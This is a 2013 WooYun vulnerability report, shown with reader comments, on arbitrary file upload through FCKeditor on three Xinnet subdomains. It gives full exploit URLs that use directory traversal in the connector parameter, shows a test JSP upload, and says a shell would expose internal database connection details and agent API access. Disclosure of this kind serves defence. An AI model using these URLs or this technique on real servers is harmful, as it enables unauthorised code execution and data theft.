当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025745

漏洞标题:新网数码三个重要分站可拿shell

相关厂商:新网华通信息技术有限公司

漏洞作者: Finger

提交时间:2013-06-12 17:19

修复时间:2013-06-17 17:20

公开时间:2013-06-17 17:20

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-12: 细节已通知厂商并且等待厂商处理中
2013-06-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新网数码三个重要分站可拿shell,涉及域名管理、注册的重要接口。

详细说明:

漏洞很低级,对安全重视一些即可避免。
FCKeditor任意文件上传
新网主站出现过FCKeditor的漏洞、代理商的网站系统也出现过FCKeditor漏洞,可见新网的很多web系统是用FCKeditor编辑器的
那么其他分站是不是也存在这种漏洞呢?
这里我们看下http://qqmail.xinnet.com
http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
很不幸 返回状态是404
那么是不是qqmail.xinnet.com就不是使用FCKeditor呢?
我们继续看 于是发现了:
http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
返回HTTP Status 500 很明显 文件是存在的
新网应该是对FCKeditor的问题做过考虑的
那这样我们是不是就无法利用了呢?
不是的 我们可以本地构建个表单向http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector提交
但事实上不用这么麻烦
后来我又发现了这个
http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
当然 这个url是不对的

QQ截图20130612140108.png


因为connectors/jsp/connector这个路径是错误的
正确的url:
http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
到这里我们就可以上传任意文件了
传个helloworld吧

<HTML>
<HEAD>
<TITLE>HelloWorld!</TITLE>
</HEAD>
<BODY>
<%
out.println("<h1>Hello World!<br>世界,你好!</h1>");
%>
</BODY>
</HTML>


其他的还有:
http://sinamail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
http://api.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

漏洞证明:

QQ截图20130612140637.png


QQ截图20130612141334.png


QQ域名邮箱管理系统、新浪域名邮箱管理系统、代理商的域名管理、注册的api、代理系统
上传shell之后 可以做很多的 里面有新网一些数据库连接信息(虽然是内网地址,但我们还是可以连接的) 新网代理商的api权限还是很大的

修复方案:

版权声明:转载请注明来源 Finger@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-06-17 17:20

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2013-06-15 00:28 | 射不出来 ( 路人 | Rank:7 漏洞数:4 | 我是来混的...)

    这是跟新网有仇?

  2. 2013-06-17 22:08 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    这种厂商。。大家怎么看。?

  3. 2013-06-18 01:38 | Ra1nker ( 路人 | 还没有发布任何漏洞 | TeST)

    @蟋蟀哥哥 我用快播看

  4. 2013-06-18 14:53 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    忽略并全部删除。洞主啊,留着自己玩吧,何必呢

  5. 2013-07-24 13:51 | 农夫娃哈哈 ( 路人 | Rank:2 漏洞数:3 | 初来乍到 请多关照)

    不地道